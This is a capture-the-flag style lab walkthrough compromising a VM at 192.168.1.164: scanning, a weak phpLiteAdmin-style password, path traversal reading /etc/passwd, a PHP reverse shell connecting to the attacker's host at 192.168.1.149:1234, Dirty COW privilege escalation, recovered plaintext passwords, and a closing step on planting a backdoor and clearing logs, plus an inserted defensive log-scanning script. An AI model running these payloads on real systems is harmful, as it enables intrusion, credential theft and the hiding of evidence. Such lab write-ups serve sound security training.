1. Host discovery
arp-fingerprint arp-scan
192.168.1.164 00:0c:29:01:73:70 VMware, Inc.
2. Port discovery
nmap -p 0-65535 192.168.1.164
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3. Directory scan
dirb http://192.168.1.164
---- Entering directory: http://192.168.1.164/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.164/dbadmin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.164/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.164/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.164/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
4. Weak password
http://192.168.1.164/dbadmin/
admin
5. Arbitrary file read
http://192.168.1.164/view.php?page=../../../../../etc/passwd
# only part of the output is shown
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
6. A one-line webshell can be written into the database
It is then reached through the arbitrary file read:
http://192.168.1.164/view.php?page=../../../../..//usr/databases/test.php
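As an added example from the defender's side (not part of this write-up), the following script scans web-server access logs for the kind of view.php?page= traversal requests shown above, including percent-encoded and double-encoded variants. The log lines are constructed for the example, and the /usr/databases/ marker is taken from the path used in this write-up.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not from the write-up); lines 2 and 3 replay
# the view.php?page= requests described above, once plain and once percent-encoded.
SAMPLE_LOG = """\
192.168.1.149 - - [11/Apr/2021:10:01:02 +0800] "GET /view.php?page=tools.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.149 - - [11/Apr/2021:10:01:05 +0800] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.1.149 - - [11/Apr/2021:10:01:09 +0800] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2F%2Fusr%2Fdatabases%2Ftest.php HTTP/1.1" 200 64 "-" "curl/7.74.0"
192.168.1.149 - - [11/Apr/2021:10:01:12 +0800] "GET /css/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')   # a ".." path segment after decoding/normalising
# Paths that almost never belong in a file-include parameter; /usr/databases/ is the
# directory the write-up reads the SQLite database file from.
SENSITIVE_MARKERS = ('/etc/passwd', '/etc/shadow', '/proc/self/', '/usr/databases/')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (..%252F) are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyze_query(query):
    """Return (param, decoded_value, reason) for every suspicious query parameter."""
    hits = []
    for part in query.split('&') if query else []:
        name, _, raw = part.partition('=')
        value = decode_fully(raw).replace('\\', '/')   # treat backslashes as separators too
        reasons = []
        if TRAVERSAL_RE.search(value):
            reasons.append('dot-dot traversal')
        reasons += [f'sensitive target {m}' for m in SENSITIVE_MARKERS if m in value.lower()]
        if reasons:
            hits.append((name, value, ', '.join(reasons)))
    return hits

def scan_log(text):
    """Parse access-log lines and return one alert dict per suspicious parameter."""
    alerts = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        _, _, query = m['url'].partition('?')
        for name, value, reason in analyze_query(query):
            alerts.append({'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
                           'param': name, 'value': value, 'reason': reason})
    return alerts
```

A 200 status on a flagged request (as in the sample) is the signal that the read actually succeeded and the host should be treated as compromised rather than merely probed.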
7. Accounts in the database
The passwords decode to:
root 34kroot34
zico zico2215@
Connecting over SSH with them fails.
8. Upload a script file through the site's database to obtain a shell on the target;
Create a database: test;
Create a table: shell, with one field;
service apache2 start
Add shell.txt in /var/www/html on Kali:
<?php $sock=fsockopen("192.168.1.149",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
Insert into the database the code that downloads shell.txt,
Listen on port 1234 on Kali; open the database file through the arbitrary file read in the browser, and the target's shell is obtained;
Convert the shell into an interactive tty:
python -c 'import pty;pty.spawn("/bin/bash")'
9. Upload Dirty COW to escalate privileges
In the end, a firefart user with root privileges is obtained; root is overwritten and replaced
10. Check the WordPress configuration file under zico's home directory and find zico's account and password
SSH connection succeeds
11. Leave a backdoor and clear the logs
© 2016 - 2024 掌控者 All Rights Reserved.
spider
Posted on 2021-4-11
Can you write out the steps for leaving a backdoor and clearing traces?